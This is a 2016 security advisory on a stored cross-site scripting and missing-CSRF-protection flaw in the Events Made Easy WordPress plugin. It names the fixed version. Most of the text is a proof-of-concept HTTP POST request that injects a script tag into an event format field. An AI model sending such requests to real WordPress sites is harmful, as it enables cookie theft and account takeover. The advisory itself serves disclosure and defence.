Advisory

Job Diesveld, July 2016

Cross-Site Scripting vulnerability in Events Made Easy WordPress plugin

Abstract

A Cross-Site Scripting vulnerability has been found in the Events Made Easy WordPress plugin. By using this issue an attacker can create a specially crafted event which, when posted to WordPress, injects malicious JavaScript code into the application. This code will execute within the browser of any user who views the relevant application content.

OVE ID

OVE-20160729-0001

Fix

This issue has been fixed in Events Made Easy plugin version 1.6.21.

Tested versions

This issue was successfully tested on Events Made Easy plugin version 1.6.20.

Introduction

The WordPress Events Made Easy plugin is a full-featured event management solution for WordPress. It supports public, private, draft and recurring events, locations management, RSVP (+ optional approval), Paypal, 2Checkout, FirstData and Google maps.

Upon adding a new Events Made Easy event within the WordPress admin interface, the plugin allows script code to be added to among others the Single Event Format textbox. The plugin insufficiently checks the nonces closedpostboxesnonce and meta-box-order-nonce when the event is posted to the server, nor is any other nonce employed to prevent CSRF from occurring. If an attacker can lure a WordPress admin into posting an event with malicious script code, this code is subsequently stored in the application and can be used to perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

/advisory/SFY20160756/poc-1.png

Proof of Concept

The following request can be used to create an event containing JavaScript that will obtain the cookie of the current user:


POST /wp-admin/admin.php?page=events-manager&eme_admin_action=update_event&event_id=16 HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: <session cookies>
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------224523339434990794855940370
Content-Length: 8579
   
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_status"
   
5
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_contactperson_id"
   
-1
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_seats"
   
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="price"
   
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="currency"
   
EUR
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_max_allowed"
   
10
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_min_allowed"
   
1
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_rsvp_discount"
   
   
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_rsvp_discountgroup"
   
   
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="rsvp_number_days"
   
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="rsvp_number_hours"
   
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_rsvp_end_target"
   
start
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_name"
   
fooname
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_slug"
   
fooname
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="localised_recurrence_date"
   
07/29/2016
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_start_date"
   
2016-07-29
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="localised_recurrence_end_date"
   
07/29/2016
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_end_date"
   
2016-07-29
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_freq"
   
daily
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_interval"
   
   
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_byweekno"
   
1
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="recurrence_byday"
   
1
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="localised_event_start_date"
   
07/29/2016
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_start_date"
   
2016-07-29
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="localised_event_end_date"
   
07/29/2016
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_end_date"
   
2016-07-29
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_start_time"
   
01:22PM
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_end_time"
   
01:22PM
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_page_title_format_tpl"
   
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_page_title_format"
   
lalalala
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_single_event_format_tpl"
   
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_single_event_format"
   
<p>#_STARTDATE - #_STARTTIME</p><p>#_TOWN</p><p>#_NOTES</p><p>#_ADDBOOKINGFORM</p><p>#_MAP</p><script>alert(document.cookies)</script>
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_contactperson_email_body_tpl"
   
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_contactperson_email_body"
   
   
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_registration_recorded_ok_html_tpl"
   
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_registration_recorded_ok_html"
   
   
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_respondent_email_body_tpl"
   
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_respondent_email_body"
   
   
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_registration_pending_email_body_tpl"
   
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_registration_pending_email_body"
   
   
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_registration_updated_email_body_tpl"
   
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_registration_updated_email_body"
   
   
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_registration_cancelled_email_body_tpl"
   
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_registration_cancelled_email_body"
   
Dear #_RESPNAME,
   
Your request to reserve #_RESPSPACES space(s) for #_EVENTNAME has been cancelled.
   
Yours faithfully,awfe
#_CONTACTPERSON
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_registration_denied_email_body_tpl"
   
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_registration_denied_email_body"
   
Dear #_RESPNAME,
   
Your request to reserve #_RESPSPACES space(s) for #_EVENTNAME has been denied.
   
Yours faithfully,
#_CONTACTPERSONawef
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_registration_form_format_tpl"
   
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_registration_form_format"
   
   
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="eme_prop_event_cancel_form_format_tpl"
   
0
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_cancel_form_format"
   
   
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_name"
   
piet
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_address"
   
kaas
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_town"
   
foo
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_latitude"
   
57.198
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="location_longitude"
   
9.67063
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="content"
   
gold
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_image_url"
   
   
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_image_id"
   
   
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_url"
   
   
-----------------------------224523339434990794855940370
Content-Disposition: form-data; name="event_update_button"
   
Update »
-----------------------------224523339434990794855940370

Latest News & Research

Work with us →